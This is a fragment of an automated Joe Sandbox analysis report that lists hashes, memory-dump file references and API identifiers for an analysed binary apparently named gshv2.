                              • Instruction ID: 4527abe2cbdbdca5118dea77fba03a610d89ff3a67b6242f9dacf91d647792cd
                              • Opcode Fuzzy Hash: ec3e9623ea8803e7c10f5c9c5fd16f31160b46dcd3912112c4944d8f7bc9fb38
                              • Instruction Fuzzy Hash: 17A12B22E14B9585EB21DB35D4442BEB3B4FF99B94F049332EF8952664DF3AE482C701
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: memcpy$freemalloc
                              • String ID:
                              • API String ID: 3313557100-0
                              • Opcode ID: 521e352762d68c93842951c13a3d6e3656fcf514fe1801a85e808f798ed414ab
                              • Instruction ID: 0a5d6ade01be802a18433dc003c248d278797638473fb143c2756405136c22c7
                              • Opcode Fuzzy Hash: 521e352762d68c93842951c13a3d6e3656fcf514fe1801a85e808f798ed414ab
                              • Instruction Fuzzy Hash: DF3180B6B09B8586EF04CF15D8401786361FF88F94B189032DA8D87759CF29E482C342